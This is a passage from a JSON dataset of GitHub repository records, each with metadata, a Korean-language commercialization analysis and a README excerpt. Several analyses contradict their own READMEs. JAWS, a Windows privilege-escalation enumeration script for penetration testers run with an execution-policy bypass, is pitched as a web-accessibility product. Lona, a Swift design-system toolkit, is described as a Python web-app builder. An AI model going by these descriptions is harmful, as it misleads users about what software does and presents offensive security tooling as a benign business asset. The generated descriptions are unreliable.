Status](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg)](http://dftech.oss-cn-hangzhou.aliyuncs.com/opendface/img/build_pass.svg) | [![Build Status](","composite_score":0.5143,"license_safety_tag":"safe"},{"name":"miguelmota/cointop","github_url":"https://github.com/miguelmota/cointop","stars":8,"language":"Go","license":"Apache-2.0","abandonment_months":26,"description":"# Cointop 저장소 분석\n\n## 왜 보물인가\n암호화폐 시세를 터미널(검은 화면)에서 빠르게 확인할 수 있는 도구로, 투자자들이 매매 결정을 빠르게 내릴 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 암호화폐 거래소나 투자 플랫폼에 내장하여 고객에게 실시간 시세 모니터링 기능 제공\n2. **내부 업무 도구**: 암호화폐 펀드나 ","readme_excerpt":"<h3 align=\"center\">\n  <br />\n  <img src=\"https://user-images.githubusercontent.com/168240/39561871-51cda852-4e5d-11e8-926b-7692d43143e8.png\" alt=\"logo\" width=\"400\" />\n  <br />\n  <br />\n  <br />\n</h3>\n\n# cointop\n\n> Coin tracking for hackers\n\n[![License](http://img.shields.io/badge/license-Apache-blue.svg)](https://raw.githubusercontent.com/cointop-sh/cointop/master/LICENSE)\n[![Build Status](https://travis-ci.org/cointop-sh/cointop.svg?branch=master)](https://travis-ci.org/cointop-sh/cointop)\n[![Go Report Card](https://goreportcard.com/badge/github.com/cointop-sh/cointop?)](https://goreportcard.com/report/github.com/cointop-sh/cointop)\n[![GoDoc](https://godoc.org/github.com/cointop-sh/cointop?status.svg)](https://godoc.org/github.com/cointop-sh/cointop)\n[![Mentioned in Awesome Terminals](https://awesome.re/mentioned-badge.svg)](https://github.com/k4m4/terminals-are-sexy)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](#contributing)\n\n[`cointop`](https://github.","composite_score":0.5143,"license_safety_tag":"safe"},{"name":"hustcc/onfire.js","github_url":"https://github.com/hustcc/onfire.js","stars":498,"language":"TypeScript","license":"MIT","abandonment_months":86,"description":"# hustcc/onfire.js 분석 보고서\n\n## 왜 보물인가\n복잡한 프로그램의 여러 부분이 서로 통신하도록 도와주는 경량 도구로, 개발자들이 더 간단하게 코드를 작성할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n\n**1. 실시간 협업 SaaS (예: 팀 프로젝트 관리 도구)**\n팀원들이 동시에 작업할 때 각자의 변경 사항을 즉시 다른 사람의 화면에","readme_excerpt":"# onfire.js\n\n> nano version (~ 500b) for event-emitter.\n\n[![Build Status](https://travis-ci.org/hustcc/onfire.js.svg?branch=master)](https://travis-ci.org/hustcc/onfire.js)\n[![npm](https://img.shields.io/npm/v/onfire.js.svg)](https://www.npmjs.com/package/onfire.js)\n\n\n[中文文档](./README_zh.md) | [English Doc](./README.md)\n\n\n## Install\n\n> npm i --save onfire.js\n\n\n\n## Usage\n\n```js\nimport EE from 'onfire.js';\n\nconst ee = new EE();\n\nee.on('mouseover', () => {});\n\nee.once('click', () => {});\n\nee.fire('click', 1, 'hello', true);\n\nee.off('click');\n```\n\n\n\n## API\n\nSimple and similar with `event-emitter`.\n\n\n - `on(eventName: string, callback: Function)`: listen an event.\n - `once(eventName: string, callback: Function)`: listen a event only once.\n - `fire(eventName: string, ...parameters: any[])`: emit / trigger an event with parameters.\n - `off(eventName?: string, callback?: Function)`: unsubscribe an event.\n\n\n\n## Used\n\n - Events subscribe and dispatcher.\n - `Cross-component communication` for Reac","composite_score":0.5143,"license_safety_tag":"safe"},{"name":"sandy1709/catuserbot","github_url":"https://github.com/sandy1709/catuserbot","stars":10,"language":"Python","license":"AGPL-3.0","abandonment_months":29,"description":"# sandy1709/catuserbot 사업화 분석\n\n## 왜 보물인가\n고양이 테마의 사용자 봇으로, 반복적인 채팅 작업을 자동화하여 시간을 절약할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 소규모 커뮤니티 운영자를 위한 자동 채팅 관리 구독 서비스\n2. **내부 업무 도구**: 기업의 고객 응답팀이 반복 질문에 자동 ","readme_excerpt":"# CatUserbot\n\nA simple Telegram userbot based on Telethon .\n![catuserbot logo](https://graph.org/file/4860c8e1a5a56d0616b79.png)\n[![Hits](https://hits.seeyoufarm.com/api/count/incr/badge.svg?url=https%3A%2F%2Fgithub.com%2Fsandy1709%2Fcatuserbot&count_bg=%2379C83D&title_bg=%23555555&icon=&icon_color=%23E7E7E7&title=hits&edge_flat=false)](https://github.com/TgCatUB/catuserbot)\n[![CodeFactor](https://www.codefactor.io/repository/github/TgCatUB/catuserbot/badge?&style=flat-square)](https://www.codefactor.io/repository/github/TgCatUB/catuserbot)\n[![Open Source Love](https://badges.frapsoft.com/os/v2/open-source.png?v=103)](https://github.com/ellerbrock/open-source-badges/)\n[![Maintenance](https://img.shields.io/badge/Maintained%3F-yes-green?&style=flat-square)](https://GitHub.com/TgCatUB/catuserbot/graphs/commit-activity)\n![Repo Size](https://img.shields.io/github/repo-size/TgCatUB/catuserbot?&style=flat-square&logo=github)\n[![GitHub license](https://img.shields.io/github/license/TgCatUB/ca","composite_score":0.5142,"license_safety_tag":"risky"},{"name":"smaranjitghose/awesome-portfolio-websites","github_url":"https://github.com/smaranjitghose/awesome-portfolio-websites","stars":21,"language":"HTML","license":"MIT","abandonment_months":22,"description":"# awesome-portfolio-websites 분석\n\n## 왜 보물인가\n포트폴리오 웹사이트를 만드는 데 필요한 모든 자료와 예시를 한곳에 모아놓은 가이드북으로, 자신의 작업물을 효과적으로 보여주고 싶은 사람들에게 큰 도움이 됩니다.\n\n## 어디에 쓸 수 있나\n- **포트폴리오 빌더 SaaS**: 드래그앤드롭으로 포트폴리오를 만들어주는 온라인 서비스로 ","readme_excerpt":"![Awesome Portfolio Website](./readme_assets/banner_apw.png)\n\n<div align=\"center\">\n\n<a href=\"https://github.com/smaranjitghose/awesome-portfolio-websites\"><img src=\"https://badges.frapsoft.com/os/v1/open-source.svg?v=103\"></a>\n<a href=\"https://github.com/smaranjitghose/awesome-portfolio-websites\"><img src=\"https://img.shields.io/badge/Built%20by-developers%20%3C%2F%3E-0059b3\"></a>\n<a href=\"https://github.com/smaranjitghose/awesome-portfolio-websites\"><img src=\"https://img.shields.io/static/v1.svg?label=Contributions&message=Welcome&color=yellow\"></a>\n<a href=\"https://github.com/smaranjitghose/\"><img src=\"https://img.shields.io/badge/Maintained%3F-yes-brightgreen.svg?v=103\"></a>\n<a href=\"https://github.com/smaranjitghose/awesome-portfolio-websites/blob/master/LICENSE\"><img src=\"https://img.shields.io/badge/license-MIT-blue.svg?v=103\"></a>\n\n<a href=\"https://github.com/smaranjitghose/awesome-portfolio-websites/graphs/contributors\"><img src=\"https://img.shields.io/github/contributors/smara","composite_score":0.5142,"license_safety_tag":"safe"},{"name":"ruinmessi/RFBNet","github_url":"https://github.com/ruinmessi/RFBNet","stars":14,"language":"Python","license":"MIT","abandonment_months":56,"description":"# RFBNet 저장소 분석\n\n## 왜 보물인가\n이미지 속 물체를 자동으로 찾아내는 기술로, 보안 카메라·자동화 검사·드론 감시 등 실제 산업에서 즉시 활용 가능합니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 제조업체를 위한 클라우드 기반 품질검사 플랫폼 (불량품 자동 탐지)\n2. **내부 업무 도구**: 물류센터의 소포 분류 자동화 시스","readme_excerpt":"# Receptive Field Block Net for Accurate and Fast Object Detection\n\nBy Songtao Liu, Di Huang, Yunhong Wang\n\n## Updatas (2021/07/23): YOLOX is [here!](https://github.com/Megvii-BaseDetection/YOLOX), stronger YOLO with ONNX, TensorRT, ncnn, and OpenVino supported!!\n## Updates: we propose a new method to get 42.4 mAP at 45 FPS on COCO, code is available [here](https://github.com/ruinmessi/ASFF)\n\n### Introduction\nInspired by the structure of Receptive Fields (RFs) in human visual systems, we propose a novel RF Block (RFB) module, which takes the relationship between the size and eccentricity of RFs into account, to enhance the discriminability and robustness of features. We further  assemble the RFB module to the top of SSD with a lightweight CNN model, constructing the RFB Net detector. You can use the code to train/evaluate the RFB Net for object detection. For more details, please refer to our [ECCV paper](https://eccv2018.org/openaccess/content_ECCV_2018/papers/Songtao_Liu_Receptive_Fi","composite_score":0.5142,"license_safety_tag":"safe"},{"name":"airbnb/Lona","github_url":"https://github.com/airbnb/Lona","stars":182,"language":"Swift","license":"MIT","abandonment_months":41,"description":"# Lona 프로젝트 분석\n\n## 왜 보물인가\n개발자들이 파이썬이라는 단순한 프로그래밍 언어만으로 웹 애플리케이션을 빠르게 만들 수 있게 해주는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 중소 기업용 재고관리·인사관리 웹 서비스를 빠르게 개발하여 월 구독료로 판매\n2. **내부 업무 도구**: 대기업의 HR팀·마케팅팀이 자신들의 ","readme_excerpt":"<p align=\"center\">\n  <img src=\"studio/LonaStudio/Assets.xcassets/AppIcon.appiconset/icon_256x256@2x.png\" width=\"256\" height=\"256\" />\n</p>\n\n<h1 align=\"center\">Lona (Developer Preview)</h1>\n\n<br />\n\n> This project is in an early stage and lacks documentation – however, with some effort, it can be used very effectively. If you're interested in contributing or using it at your company, feel free to open a GitHub issue or get in touch with me on Twitter [@dvnabbott](https://twitter.com/dvnabbott). I'm currently supporting a few early adopters.\n>\n> Airbnb doesn't provide support for this project. The code and automated tests are not at the same degree of technical rigor as other Airbnb projects.\n\n## Overview\n\n[![Build Status](https://travis-ci.org/airbnb/Lona.svg?branch=master)](https://travis-ci.org/airbnb/Lona)\n\nLona is a collection of tools for building design systems and using them to generate cross-platform UI code, Sketch files, and other artifacts.\n\nLona consists primarily of 3 parts:","composite_score":0.5141,"license_safety_tag":"safe"},{"name":"SebLague/Terraforming","github_url":"https://github.com/SebLague/Terraforming","stars":499,"language":"C#","license":"MIT","abandonment_months":60,"description":"# Terraforming 저장소 분석\n\n## 왜 보물인가\n컴퓨터가 자동으로 현실감 있는 산, 계곡, 평원 같은 지형을 만들어내는 기술로, 게임·영화·건축 시뮬레이션 분야에서 매우 높은 가치를 가집니다.\n\n## 어디에 쓸 수 있나\n\n**1. 게임 개발 SaaS**\n게임 제작자들이 구독 형태로 이용해 수 초 안에 광활한 게임 맵을 자동 생성하는 웹 서비스\n\n","readme_excerpt":"# Terraforming\n\n[Watch video](https://youtu.be/vTMEdHcKgM4)\n\n![Terraforming](https://raw.githubusercontent.com/SebLague/Images/master/Terraforming.png)\n![TerraformingFiles](https://github.com/SebLague/Images/blob/master/TerraformingFiles.png?raw=true)\nCreated with Unity 2020.3\n","composite_score":0.5141,"license_safety_tag":"safe"},{"name":"ga642381/ML2021-Spring","github_url":"https://github.com/ga642381/ML2021-Spring","stars":6,"language":"Jupyter Notebook","license":"unknown","abandonment_months":31,"description":"# ga642381/ML2021-Spring 상용화 분석\n\n## 왜 보물인가\n머신러닝(컴퓨터가 데이터로부터 스스로 배우는 기술)의 입문부터 실전까지 체계적으로 학습할 수 있는 완전한 교육 자료 모음입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 온라인 교육 플랫폼에 통합하여 \"머신러닝 초보자 마스터 코스\" 구독 서비스로 운영\n2. **내부","readme_excerpt":"![banner](https://i.imgur.com/78UhAe2.png)\n<p>\n  <h2 align=\"center\">\n  機器學習 Machine Learning 2021 Spring by National Taiwan University<br>\n  </h2>\n</p>\n\n<p align=\"center\">\n  <img src=\"https://i.imgur.com/UehEGrH.png\" width=\"500\">\n</p>\n\nThis repository contains code and slides of 15 homeworks for Machine Learning instructed by [李宏毅(Hung-Yi Lee)](https://speech.ee.ntu.edu.tw/~hylee/index.php). All the information about this course can be found on the [course website](https://speech.ee.ntu.edu.tw/~hylee/ml/2021-spring.html). \n\n## Lecture Videos\nThe lecture videos are available on Hung-Yi Lee's [youtube channel](https://www.youtube.com/channel/UC2ggjtuuWvxrHHHiaDH1dlQ).\n\n[<img src=\"https://i.imgur.com/SFDpe52.jpg\" width=\"500\">](https://www.youtube.com/watch?v=Ye018rCVvOo&ab_channel=Hung-yiLee)\n\n\n## 15 Homeworks\n* HW1 : Regression\n* HW2 : Classification\n* HW3 : CNN\n* HW4 : Self-Attention\n* HW5 : Transformer\n* HW6 : GAN\n* HW7 : BERT\n* HW8 : Autoencoder\n* HW9 : Explainable AI\n* HW10 : Adversa","composite_score":0.514,"license_safety_tag":"unknown"},{"name":"jonaswinkler/paperless-ng","github_url":"https://github.com/jonaswinkler/paperless-ng","stars":9,"language":"Python","license":"GPL-3.0","abandonment_months":40,"description":"# Paperless-ng 상용화 분석\n\n## 왜 보물인가\n집에 쌓여있는 종이 서류들을 스캔해서 디지털로 자동 정리해주는 개인용 문서 관리 시스템입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 종이 서류 스캔 대행 서비스 + 클라우드 보관 구독 모델\n2. **내부 업무 도구**: 대형 병원·법무법인의 환자기록·사건 서류를 자동 분류하는 백","readme_excerpt":"[![ci](https://github.com/jonaswinkler/paperless-ng/workflows/ci/badge.svg)](https://github.com/jonaswinkler/paperless-ng/actions)\n![Ansible Role](https://github.com/jonaswinkler/paperless-ng/workflows/Ansible%20Role/badge.svg)\n[![Crowdin](https://badges.crowdin.net/paperless-ng/localized.svg)](https://crowdin.com/project/paperless-ng)\n[![Documentation Status](https://readthedocs.org/projects/paperless-ng/badge/?version=latest)](https://paperless-ng.readthedocs.io/en/latest/?badge=latest)\n[![Gitter](https://badges.gitter.im/paperless-ng/community.svg)](https://gitter.im/paperless-ng/community?utm_source=badge&utm_medium=badge&utm_campaign=pr-badge&utm_content=badge)\n[![Docker Hub Pulls](https://img.shields.io/docker/pulls/jonaswinkler/paperless-ng.svg)](https://hub.docker.com/r/jonaswinkler/paperless-ng)\n[![Coverage Status](https://coveralls.io/repos/github/jonaswinkler/paperless-ng/badge.svg?branch=master)](https://coveralls.io/github/jonaswinkler/paperless-ng?branch=master)\n\n# Archiv","composite_score":0.514,"license_safety_tag":"restricted"},{"name":"infochimps-labs/ironfan","github_url":"https://github.com/infochimps-labs/ironfan","stars":500,"language":"Ruby","license":"NOASSERTION","abandonment_months":144,"description":"# Ironfan 저장소 분석\n\n## 왜 보물인가\n대규모 서버 인프라를 자동으로 구성하고 관리할 수 있는 도구로, 기업이 복잡한 IT 시스템을 빠르고 효율적으로 운영할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n1. **클라우드 관리 SaaS**: 기업들이 자신의 서버 환경을 손쉽게 설정하고 모니터링하는 웹 서비스로 판매\n2. **내부 업무 도구**: ","readme_excerpt":"# Ironfan Core: Knife Tools and Core Models\n\nIronfan, the foundation of The Infochimps Platform, is an expressive toolset for constructing scalable, resilient architectures. It works in the cloud, in the data center, and on your laptop, and it makes your system diagram visible and inevitable. Inevitable systems coordinate automatically to interconnect, removing the hassle of manual configuration of connection points (and the associated danger of human error).\nFor more information about Ironfan and the Infochimps Platform, visit [infochimps.com](http://www.infochimps.com/).\n\nThis repo implements:\n\n* Core models to describe your system diagram with a clean, expressive domain-specific language\n* Knife plugins to orchestrate clusters of machines using simple commands like `knife cluster launch`\n* Logic to coordinate truth among chef server and cloud providers\n\n## Getting Started\n\nTo jump right into using Ironfan, follow our [Installation Instructions](https://github.com/infochimps-labs/iro","composite_score":0.514,"license_safety_tag":"unknown"},{"name":"eleme/lancet","github_url":"https://github.com/eleme/lancet","stars":8,"language":"Java","license":"unknown","abandonment_months":33,"description":"# Lancet 저장소 분석\n\n## 왜 보물인가\n프로그래밍 개발 시간을 단축할 수 있는 실용적인 도구 모음입니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 개발사가 자체 서비스에 내장하여 기능 개발 속도를 높이고 사용자에게 더 나은 경험 제공\n- **내부 업무 도구**: 회사의 개발팀이 반복적인 작업을 자동화하여 더 중요한 업무에 집중\n- *","readme_excerpt":"# Lancet\n\n[Chinese README](README_zh.md)\n\nLancet is a lightweight AOP framework for Android.\n\nIt's fast and just take up a little time during compiling. Also, it supports incremental compiling.\n\nBut it provides great api to help you coding in Android.\n\nIt takes no runtime jar.\n\nIn addition, not only App developers but also SDK developers can use Lancet.\n\n## Usage\n### Installation\n\nFirstly, add following code in root **build.gradle** of your project.\n\n```groovy\ndependencies {\n    classpath 'com.android.tools.build:gradle:3.3.2'\n    classpath 'me.ele:lancet-plugin:1.0.6'\n}\n```\nTips: Lancet 1.0.5 and above only supports gradle 3.3.2 and above.\n\nAnd then, add following code in your **application module's build.gradle**\n\n```groovy\napply plugin: 'me.ele.lancet'\n\ndependencies {\n    provided 'me.ele:lancet-base:1.0.6'\n}\n```\n\nThat's OK.Now you can follow our tutorial to learn how to use it.\n\n### Tutorial\n\nLancet use annotation to indicate where to cut the code and focus on interacting with orig","composite_score":0.5139,"license_safety_tag":"unknown"},{"name":"chrisballinger/BLEMeshChat","github_url":"https://github.com/chrisballinger/BLEMeshChat","stars":500,"language":"Objective-C","license":"MPL-2.0","abandonment_months":110,"description":"# BLEMeshChat 상용화 분석\n\n## 왜 보물인가\n인터넷 없이 휴대폰끼리 메시지를 주고받을 수 있는 기술로, 재난 상황이나 통신 제약 환경에서 매우 유용합니다.\n\n## 어디에 쓸 수 있나\n\n1. **재난 대응 SaaS**: 지진, 정전 등 긴급 상황에서 구급대원, 소방관들이 인터넷 없이 현장에서 신속히 소통하는 앱 제공\n2. **광산/건설 현장 업무","readme_excerpt":"# [BLEMeshChat](https://github.com/chrisballinger/BLEMeshChat) [![Build Status](https://travis-ci.org/chrisballinger/BLEMeshChat.svg?branch=master)](https://travis-ci.org/chrisballinger/BLEMeshChat)\n\n[![Screenshot](https://i.imgur.com/z8lEdPMm.png)](https://i.imgur.com/z8lEdPM.png)\n\nBluetooth LE mesh chat prototype for iOS. [Android version over here](https://github.com/onlyinamerica/blemeshchat).\n\n## Goals\n\n* Use the Bluetooth 4.0 Low Energy APIs on iOS and Android to allow for pairing-free promiscuous background synchronization for anyone with a protocol-compatible app installed.\n* Be a 100% sneakernet protocol, with absolutely no internet functionality.\n* Use modern crypto (via libsodium) that's tailored to the limitations of BLE and an ultra-high latency, unreliable sneakernet.\n* Implement a familiar and friendly Twitter-style UI/UX with a public feed, replies, reposts and (maybe) direct messaging.\n* Only show Gravatar-style avatars and hashes for other's identities until you verif","composite_score":0.5138,"license_safety_tag":"unknown"},{"name":"GengDavid/pytorch-cpn","github_url":"https://github.com/GengDavid/pytorch-cpn","stars":498,"language":"Python","license":"GPL-3.0","abandonment_months":79,"description":"# pytorch-cpn 저장소 분석\n\n## 왜 보물인가\n사진 속 사람의 자세와 움직임을 자동으로 인식하는 AI 기술로, 스포츠 분석부터 보안 시스템까지 광범위하게 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **피트니스 앱 서비스**: 사용자가 운동할 때 자세를 자동으로 분석하고 피드백을 제공하는 구독형 앱\n2. **보안 관제 시스템**: CC","readme_excerpt":"# PyTorch CPN(Cascaded Pyramid Network)\n\nThis is a PyTorch re-implementation of CPN ([Cascaded Pyramid Network](https://arxiv.org/abs/1711.07319)), winner of MSCOCO keypoints2017 challenge. The TensorFlow version can be found [here](https://github.com/chenyilun95/tf-cpn), which is implemented by the paper author.\n\n## Evaluation results on COCO minival dataset\n<center>\n\n| Method | Base Model | Input Size | BBox | AP @0.5:0.95 | AP @0.5 | AP @0.75 | AP medium | AP large |\n|:-------|:--------:|:-----:|:-------:|:-------:|:-------:|:-------:|:-------:|:-------:|\n| CPN | ResNet-50 | 256x192 | Ground Truth | 71.2 | 91.4 | 78.3 | 68.6 | 75.2 |\n| CPN | ResNet-50 | 256x192 | Detection Result | 69.2 | 88.0 | 76.2 | 65.8 | 75.6 |\n| CPN | ResNet-50 | 384x288 | Ground Truth | 74.1 | 92.5 | 80.6 | 70.6 | 79.5 |\n| CPN | ResNet-50 | 384x288 | Detection Result | 72.2 | 89.2 | 78.6 | 68.1 | 79.3 |\n| CPN | ResNet-101<sup>*</sup> | 384x288 | Ground Truth | 74.0 | 92.3 | 80.6 | 71.1 | 78.7 |\n| CPN | ResNet","composite_score":0.5138,"license_safety_tag":"restricted"},{"name":"Tencent/paxosstore","github_url":"https://github.com/Tencent/paxosstore","stars":5,"language":"C++","license":"NOASSERTION","abandonment_months":71,"description":"# Tencent/paxosstore 분석\n\n## 왜 보물인가\n대규모 데이터센터에서 데이터 손실 없이 안정적으로 정보를 저장하고 관리하는 핵심 기술로, 금융·통신·클라우드 업계의 생명줄입니다.\n\n## 어디에 쓸 수 있나\n- **클라우드 저장소 SaaS**: AWS, 구글 클라우드 같은 온라인 저장 서비스의 핵심 엔진으로 활용\n- **금융 거래 시스템 내부 ","readme_excerpt":"PaxosStore\n===========\n\n[![Build Status](https://travis-ci.org/Tencent/paxosstore.svg?branch=master)](https://travis-ci.org/Tencent/paxosstore)\n\nPaxosStore is a distributed-database initially inspired by Google MegaStore. It's the second generation of storage system developed to support current WeChat sevice and applications. \nPaxosStore has been deployed in WeChat production for more than four years, providing storage services for the core businesses of WeChat backend including user account management, user relationship management (i.e., contacts), instant messaging, social networking (i.e., Moments), and online payment (i.e., WeChat Pay). \n\nNow PaxosStore is running on thousands of machines, and is able to afford billions of peak TPS. \n\nPrior to PaxosStore, we have been using a QuorumKV storage system to support various WeChat services with strongly consistent read/write since 2011. As the number of storage servers rises to tens of thousand, the operational mantenance and development","composite_score":0.5137,"license_safety_tag":"unknown"},{"name":"koreader/kindlepdfviewer","github_url":"https://github.com/koreader/kindlepdfviewer","stars":499,"language":"Lua","license":"GPL-3.0","abandonment_months":155,"description":"# KindlePDFViewer 보물 분석\n\n## 왜 보물인가\n아마존 킨들 전자책 기기에서 PDF 파일을 편하게 읽을 수 있게 만들어주는 오픈소스 도구로, 약 500명이 관심을 가질 만큼 실용성 있는 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스: 전자책 구독 플랫폼**\n여러 출판사의 PDF 책을 킨들 기기에서 자동으로 최적화해서 읽어","readme_excerpt":"KindlePDFViewer\n===============\n\nThis is a document viewer application, created for usage on the Kindle e-ink reader.\nIt is currently restricted to 4bpp inverse grayscale displays. For PDF files\nit is using the muPDF library (see http://mupdf.com/), for DjVu files djvulibre library\nand for ebooks (fb2, mobi, ePub, etc) crengine. It can also read JPEG images using\nlibjpeg library. The user interface is scripted using Lua (see http://www.lua.org/).\n\nThe application is licensed under the GPLv3 (see COPYING file).\n\n\nBuilding\n========\n\nFollow these steps:\n\n* fetch thirdparty sources\n\t* manually fetch all the thirdparty sources:\n\t\t* init and update submodule koreader-base\n\t\t* within koreader-base:\n\t\t\t* install muPDF sources into subfolder \"mupdf\"\n\t\t\t* install muPDF third-party sources (see muPDF homepage) into a new\n\t\t\t  subfolder \"mupdf/thirdparty\"\n\t\t\t* install libDjvuLibre sources into subfolder \"djvulibre\"\n\t\t\t* install CREngine sources into subfolder \"kpvcrlib/crengine\"\n\t\t\t* install LuaJi","composite_score":0.5137,"license_safety_tag":"restricted"},{"name":"Yoctol/bottender","github_url":"https://github.com/Yoctol/bottender","stars":10,"language":"TypeScript","license":"MIT","abandonment_months":26,"description":"# Bottender 저장소 분석\n\n## 왜 보물인가\n챗봇(자동 대화 프로그램)을 여러 메신저 플랫폼(카카오톡, 라인, 페이스북 등)에서 한 번에 운영할 수 있는 기술로, 중소 비즈니스의 고객 응대 자동화 비용을 획기적으로 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. 챗봇 SaaS 플랫폼**\n- 소상공인과 중소기업을 위한 \"카톡 자동응답 관리 ","readme_excerpt":"# Bottender\n\n[![npm](https://img.shields.io/npm/v/bottender.svg)](https://www.npmjs.com/package/bottender)\n[![Build Status](https://github.com/Yoctol/bottender/workflows/Node.js%20CI/badge.svg)](https://github.com/Yoctol/bottender/actions?query=workflow%3ANode.js%20CI+branch%3Amaster)\n[![coverage](https://codecov.io/gh/Yoctol/bottender/branch/master/graph/badge.svg)](https://codecov.io/gh/Yoctol/bottender)\n[![License: MIT](https://img.shields.io/badge/License-MIT-blue.svg)](https://opensource.org/licenses/MIT)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/Yoctol/bottender#contributing)\n[![join chat](https://img.shields.io/badge/discord-join%20chat-green.svg)](https://discord.gg/apNsWBz)\n[![Gitpod Ready-to-Code](https://img.shields.io/badge/Gitpod-Ready--to--Code-blue?logo=gitpod)](https://gitpod.io/#https://github.com/Yoctol/bottender)\n[![Follow @bottenderjs](https://img.shields.io/twitter/follow/bottenderjs.svg?label=Follow%20@bottenderj","composite_score":0.5136,"license_safety_tag":"safe"},{"name":"BR-IDL/PaddleViT","github_url":"https://github.com/BR-IDL/PaddleViT","stars":22,"language":"Python","license":"Apache-2.0","abandonment_months":45,"description":"# PaddleViT 상용화 분석\n\n## 왜 보물인가\n이미지 인식 AI 기술을 누구나 쉽게 사용할 수 있게 만든 오픈소스 프로젝트로, 기업들이 자체 이미지 분석 서비스를 빠르게 구축할 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 의류/패션 회사를 위한 자동 상품 분류 및 스타일 추천 웹서비스\n- **내부 업무 도구**: 제조업체의 ","readme_excerpt":"English | [简体中文](./README_cn.md)\n\n# PaddlePaddle Vision Transformers #\n\n[![GitHub](https://img.shields.io/github/license/BR-IDL/PaddleViT?color=blue)](./LICENSE)\n[![CodeFactor](https://www.codefactor.io/repository/github/br-idl/paddlevit/badge)](https://www.codefactor.io/repository/github/br-idl/paddlevit)\n[![CLA assistant](https://cla-assistant.io/readme/badge/BR-IDL/PaddleViT)](https://cla-assistant.io/BR-IDL/PaddleViT)\n[![GitHub Repo stars](https://img.shields.io/github/stars/BR-IDL/PaddleViT?style=social)](https://github.com/BR-IDL/PaddleViT/stargazers)\n\n\n<p align=\"center\">    \n    <img src=\"./PaddleViT.png\" width=\"100%\"/>\n</p>\n \n## State-of-the-art Visual Transformer and MLP Models for PaddlePaddle ##\n\n:robot: PaddlePaddle Visual Transformers (`PaddleViT` or `PPViT`) is a collection of vision models beyond convolution. Most of the models are based on Visual Transformers, Visual Attentions, and MLPs, etc. PaddleViT also integrates popular layers, utilities, optimizers, schedulers, ","composite_score":0.5136,"license_safety_tag":"safe"},{"name":"411Hall/JAWS","github_url":"https://github.com/411Hall/JAWS","stars":6,"language":"PowerShell","license":"MIT","abandonment_months":62,"description":"# JAWS 저장소 분석\n\n## 왜 보물인가\n현재는 활발하지 않지만 웹 접근성 관련 기술이 포함되어 있어, 장애인 친화적인 디지털 환경을 만들려는 조직들에게 기초 자산으로 활용될 수 있습니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 웹사이트 접근성 검사 도구로 기업의 웹사이트가 장애인도 쉽게 사용할 수 있는지 자동으로 진단해주는 서비스\n- ","readme_excerpt":"# JAWS - Just Another Windows (Enum) Script\n\nJAWS is PowerShell script designed to help penetration testers (and CTFers) quickly identify potential privilege escalation vectors on Windows systems. It is written using PowerShell 2.0 so 'should' run on every Windows version since Windows 7.\n\n## Usage:\n\n\n**Run from within CMD shell and write out to file.**\n```\nCMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1 -OutputFilename JAWS-Enum.txt\n```\n**Run from within CMD shell and write out to screen.**\n```\nCMD C:\\temp> powershell.exe -ExecutionPolicy Bypass -File .\\jaws-enum.ps1\n```\n**Run from within PS Shell and write out to file.**\n```\nPS C:\\temp> .\\jaws-enum.ps1 -OutputFileName Jaws-Enum.txt\n```\n\n## Current Features\n  - Network Information (interfaces, arp, netstat)\n  - Firewall Status and Rules\n  - Running Processes\n  - Files and Folders with Full Control or Modify Access\n  - Mapped Drives\n  - Potentially Interesting Files\n  - Unquoted Service Paths\n  - Recent Docume","composite_score":0.5135,"license_safety_tag":"safe"},{"name":"yoheikikuta/bert-japanese","github_url":"https://github.com/yoheikikuta/bert-japanese","stars":498,"language":"Jupyter Notebook","license":"Apache-2.0","abandonment_months":64,"description":"# BERT 일본어 모델 분석\n\n## 왜 보물인가\n일본어 문서를 자동으로 이해하고 분류할 수 있는 AI 기술로, 한국 기업이 일본 시장 진출 시 필수적인 자연언어 처리 솔루션입니다.\n\n## 어디에 쓸 수 있나\n1. **일본 고객 리뷰 분석 SaaS**: 일본 이커머스 업체가 매달 구독하며 고객 피드백을 자동 분류하는 서비스\n2. **채용공고 자동분류 API","readme_excerpt":"# BERT with SentencePiece for Japanese text.\nThis is a repository of Japanese BERT model with SentencePiece tokenizer.  \n\nTo clone this repository together with the required\n[BERT](https://github.com/google-research/bert) and \n[WikiExtractor](https://github.com/attardi/wikiextractor):\n\n```sh\ngit clone --recurse-submodules https://github.com/yoheikikuta/bert-japanese\n```\n\n## Pretrained models\nWe provide pretrained BERT model and trained SentencePiece model for Japanese text.\nTraining data is the Japanese wikipedia corpus from [`Wikimedia Downloads`](https://dumps.wikimedia.org/).  \nPlease download all objects in the following google drive to `model/` directory.\n- **[`Pretrained BERT model and trained SentencePiece model`](https://drive.google.com/drive/folders/1Zsm9DD40lrUVu6iAnIuTH2ODIkh-WM-O?usp=sharing)** \n\nLoss function during training is as below (after 1M steps the loss function massively changes because `max_seq_length` is changed from `128` to `512`.):\n![pretraining-loss](pretra","composite_score":0.5135,"license_safety_tag":"safe"},{"name":"moby/hyperkit","github_url":"https://github.com/moby/hyperkit","stars":8,"language":"C","license":"BSD-2-Clause","abandonment_months":37,"description":"# moby/hyperkit 분석\n\n## 왜 보물인가\nMac 컴퓨터에서 가상 환경을 효율적으로 만들고 관리할 수 있는 핵심 기술로, Docker 같은 컨테이너 서비스들이 의존하는 필수 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스 - Mac 기반 클라우드 개발 